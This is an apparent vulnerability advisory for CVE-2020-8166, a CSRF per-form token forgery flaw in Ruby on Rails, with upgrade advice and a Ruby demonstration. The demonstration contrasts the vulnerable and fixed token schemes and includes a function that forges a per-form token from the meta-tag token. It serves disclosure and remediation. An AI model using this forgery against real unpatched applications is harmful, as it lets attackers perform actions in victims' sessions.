PT-2020-19995 · Ruby On Rails · Rails

Published 2020-05-26 · Updated 2025-09-29 · CVE-2020-8166

CVSS v2.0: 5.0 Medium
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
Name of the Vulnerable Software and Affected Versions
rails versions prior to 5.2.5
rails versions prior to 6.0.4

Description A CSRF token forgery issue exists that allows an attacker to forge a per-form CSRF token given a global CSRF token, such as the one present in the authenticity token meta tag. Per-form tokens are derived from the same session secret that the global token carries in masked form, so an attacker who obtains the global token can construct a valid per-form CSRF token for any action (path and HTTP method) in that session, defeating the extra protection that per-form tokens are meant to provide.

Recommendations For rails versions prior to 5.2.5, update to version 5.2.5 or later. For rails versions prior to 6.0.4, update to version 6.0.4 or later.
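The derivation behind this advisory, as an added, self-contained Ruby example: this is not Rails' own source (the helper names mirror Rails' CSRF helpers, but the session store, masking and comparison are simplified assumptions made here), and the action path, method and session contents are constructed sample data. It shows the vulnerable scheme, where the meta-tag token is the masked session secret, beside the fixed scheme, where the meta-tag token is a keyed hash of that secret, and runs the forgery against both.

```ruby
require "openssl"
require "securerandom"
require "base64"

# Added illustration of Rails-style CSRF token derivation, not Rails code.
# Assumptions: the real token is kept as raw bytes in a Hash standing in for
# the session, and the attacker already holds the meta-tag token somehow
# (the advisory only assumes possession, not how it was obtained).
TOKEN_LENGTH = 32
GLOBAL_CSRF_TOKEN_IDENTIFIER = "!real_csrf_token" # identifier used by patched Rails

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack("C*")
end

# Constant-time comparison so token checks do not leak by timing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# The server-side secret (Rails keeps it in session[:_csrf_token]).
def real_csrf_token(session)
  session[:_csrf_token] ||= SecureRandom.random_bytes(TOKEN_LENGTH)
end

def csrf_token_hmac(session, identifier)
  OpenSSL::HMAC.digest(OpenSSL::Digest.new("SHA256"), real_csrf_token(session), identifier)
end

# Per-form tokens: HMAC keyed by the real token over "path#method".
def per_form_csrf_token(session, action_path, method)
  csrf_token_hmac(session, [action_path, method.downcase].join("#"))
end

# Masking: XOR with a fresh one-time pad, ship pad+ciphertext base64-encoded.
# This only randomises the token per response (anti-BREACH); it hides nothing
# from whoever holds the masked value, since the pad travels with it.
def mask_token(raw_token)
  pad = SecureRandom.random_bytes(raw_token.bytesize)
  Base64.strict_encode64(pad + xor_bytes(pad, raw_token))
end

def unmask_token(masked_token)
  decoded = Base64.strict_decode64(masked_token)
  half = decoded.bytesize / 2
  xor_bytes(decoded[0, half], decoded[half, half])
end

# Vulnerable behaviour (before the fix): the meta tag carries the masked REAL token,
# i.e. the very key that per-form tokens are derived from.
def vulnerable_global_token(session)
  mask_token(real_csrf_token(session))
end

# Fixed behaviour: the meta tag carries a masked HMAC of the real token, so
# unmasking it yields a hash output, never the HMAC key.
def fixed_global_token(session)
  mask_token(csrf_token_hmac(session, GLOBAL_CSRF_TOKEN_IDENTIFIER))
end

# Attacker's step: unmask the meta-tag token, use it as the HMAC key to derive
# a per-form token for an arbitrary action, then mask it for submission.
def forge_per_form_token(meta_tag_token, action_path, method)
  key = unmask_token(meta_tag_token)
  raw = OpenSSL::HMAC.digest(OpenSSL::Digest.new("SHA256"), key,
                             [action_path, method.downcase].join("#"))
  mask_token(raw)
end

# Server-side check of a submitted token for a per-form-protected action.
def valid_per_form_token?(session, submitted_masked_token, action_path, method)
  secure_compare(unmask_token(submitted_masked_token),
                 per_form_csrf_token(session, action_path, method))
end

# Does an attacker holding only the meta-tag value get a forged per-form token
# accepted for an unrelated action? Constructed target: DELETE /admin/users/1.
def forgery_succeeds?(global_token_builder, action_path = "/admin/users/1", method = "DELETE")
  session = {}
  meta_tag_token = global_token_builder.call(session)
  forged = forge_per_form_token(meta_tag_token, action_path, method)
  valid_per_form_token?(session, forged, action_path, method)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable derivation, forged token accepted: #{forgery_succeeds?(method(:vulnerable_global_token))}"
  puts "fixed derivation,      forged token accepted: #{forgery_succeeds?(method(:fixed_global_token))}"
end
```

The masking step is what makes the flaw easy to miss: the meta-tag value looks random on every page load, but anyone holding it can strip the pad and recover the bytes underneath. In the vulnerable scheme those bytes are the HMAC key, so every per-form token follows; in the fixed scheme they are an HMAC output, and deriving further tokens from it would require inverting SHA-256-HMAC. Enabling `config.action_controller.per_form_csrf_tokens` therefore only adds protection once the global token no longer exposes the key, which is why upgrading, not just enabling per-form tokens, is the remediation.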

Exploit

Fix

Weakness Enumeration

CSRF

Related Identifiers

ALSA-2025_16880
ALT-PU-2020-2321
ALT-PU-2021-2595
ALT-PU-2023-4268
ALT-PU-2024-7814
BDU:2025-08595
CVE-2020-8166
DSA-4766-1
GHSA-JP5V-5GX4-JMJ9
OPENSUSE-SU-2020:1993-1
OPENSUSE-SU-2020:2000-1
OPENSUSE-SU-2024:10589-1
OPENSUSE-SU-2024:11317-1
OPENSUSE-SU-2024:11318-1
OPENSUSE-SU-2024:11821-1
RHSA-2021:1313
SUSE-SU-2020:3036-1
SUSE-SU-2020:3147-1
SUSE-SU-2020:3160-1
SUSE-SU-2024:0103-1

Affected Products

Alt Linux
Rails
Red Os
Suse